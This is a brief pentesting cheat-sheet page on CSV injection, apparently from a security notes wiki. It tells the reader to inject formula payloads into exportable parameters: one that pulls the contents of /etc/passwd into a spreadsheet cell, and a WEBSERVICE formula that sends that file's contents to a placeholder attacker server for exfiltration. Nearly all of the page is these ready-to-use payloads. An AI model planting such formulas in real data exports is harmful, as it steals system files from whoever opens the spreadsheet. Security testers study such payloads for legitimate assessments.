CSV Injection

If we find some parameters in which the input data can be exported in a CSV file, we could try CSV Injection.

First, in all the parameters inject the following:

='file:///etc/passwd'#$passwd.A1

Export the CSV and see if /etc/passwords contens are listed in any of the fields.

Using the following payload, the contents of the file in the victim system could be sent to a malicious server for exfiltration:

=WEBSERVICE(CONCATENATE("http://[ATTACKER_SERVER]:[PORT]/",('file:///etc/passwd'#$passwd.A1)))

Last updated 10 months ago